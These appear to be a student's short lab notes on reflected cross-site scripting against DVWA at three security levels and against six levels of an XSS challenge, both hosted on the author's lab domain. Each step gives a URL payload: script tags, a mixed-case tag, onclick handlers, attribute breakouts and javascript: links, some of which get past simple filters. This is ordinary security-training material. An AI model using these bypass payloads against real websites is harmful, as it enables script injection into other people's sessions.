0502 xss 实验

0x01 dvwa xss(reflected)

1.1 Security Level: low

use the typical <script>alert(1)</script> to pop up:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>

1.2 Security Level: medium

1. test as above, not work:
   http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>
   

2. change url as below, bingo:
   http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<Script>alert(1)</script>
   

3. alternative way:
   http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<a onclick="alert(1)">click me</a>
   

1.3 Security Level: high

test , bingo:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<a onclick="alert(1)">click me</a>

0x02 xss challenge

2.1 level 1

payload: http://n00p.me/xss/level1.php?name=<script>alert(1)</script>

2.2 level 2

test typical, and notice this line in source code:

<input name=keyword  value="<script>alert(1)</script>">

try to enclose the double quota , and this is payload:
n00p.me/xss/level2.php?keyword=a" onclick=alert(1) id=" &submit=搜索

2.3 level 3

same as level 2 except double quota to single quota
n00p.me/xss/level3.php?keyword=a' onclick=alert(1) id=' &submit=搜索

2.4 level 4

same as level 2

2.5 level 5

view the source code, notice that the script has been alted

<input name=keyword  value="<scr_ipt>alert(1)</script>">

change path, as below:
http://n00p.me/xss/level5.php?keyword= a"><a href=javascript:alert(1)>bbb</a> <" &submit

2.6 level 6

view the source code, notice that the href has been alted

<input name=keyword  value="   a"><a hr_ef=javascript:alert(1)>bbb</a> <"         ">

turn href to Capital Letters , like hRef
n00p.me/xss/level6.php?keyword= a"><a hRef=javascript:alert(1)>bbb</a> <" &submit